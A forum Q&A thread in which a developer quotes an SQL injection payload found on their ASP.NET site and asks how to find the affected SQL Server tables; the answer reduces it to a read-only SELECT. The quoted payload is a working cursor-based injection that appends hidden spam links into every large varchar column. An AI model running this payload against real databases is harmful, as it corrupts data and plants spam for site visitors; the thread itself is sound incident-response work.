# Find the tables affected by SQL injection

Tags: sql, sql-server, cursor, sql-injection

Recently, we discovered that one of our aspx handlers was targeted by an sql injection attack. What made it possible was the fact that we took a substring of the url starting at index X until the end of the url string and then matched it with records in the database which made it easy for the attackers.

Here is an example of the injection they performed:

```
;declare @c cursor;
declare @d varchar(4000);
set @c=cursor 
for select 
'update ['+TABLE_NAME+'] 
set ['+COLUMN_NAME+']=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 
when 0 then ''''+char(60)+''div style="display:none"''+char(62)
+''are abortions safe ''
+char(60)+''a href="http:''+char(47)+char(47)
+''www.ooblong.com''+char(47)+''blog''+char(47)
+''template''+char(47)+''page''+char(47)+''abortion-clinics-nyc.aspx"''
+char(62)+case ABS(CHECKSUM(NewId()))%3 
when 0 then ''reasons against abortion'' 
when 1 then ''pregnant abortion'' 
else ''pill for pregnancy termination'' end 
+char(60)+char(47)+''a''+char(62)+'' how much does a abortion cost''
+char(60)+char(47)+''div''+char(62)+'''' else '''' end' 
FROM sysindexes AS i 
INNER JOIN sysobjects AS o 
ON i.id=o.id 
INNER JOIN INFORMATION_SCHEMA.COLUMNS 
ON o.NAME=TABLE_NAME 
WHERE(indid=0 or indid=1) 
and DATA_TYPE like '%varchar' 
and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);
open @c;
fetch next from @c into @d;
while @@FETCH_STATUS=0 
begin exec (@d);
fetch next from @c into @d;
end;
close @c--
```

We have already secured our aspx handlers to refuse these kinds of requests. Now we would like to find out which tables were affected by this attack. We discovered that at least 2 tables are affected, but we are afraid there could be more. How can we reverse engineer the above SQL to find out which tables it affected?

Answer (score 1, accepted):

Just take the query you've shown and strip off all unnecessary details about attack itself, and you will get:

```
SELECT TABLE_NAME, COLUMN_NAME
FROM sysindexes AS i 
INNER JOIN sysobjects AS o 
ON i.id=o.id 
INNER JOIN INFORMATION_SCHEMA.COLUMNS 
ON o.NAME=TABLE_NAME 
WHERE(indid=0 or indid=1) 
and DATA_TYPE like '%varchar' 
and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);
```

Tables and columns in output of this query were used in cursor and affected by attack you've mentioned.

Comment: Already tried that, it returned 0 rows. The attackers ran many requests, maybe not all of them were successful. I will try to find more instances of the attack.

Comment: Never mind, I just had to include the following before I run the script and I got the correct tables. Seems consistent with the tables we saw are affected already;
    USE DATABASE_NAME;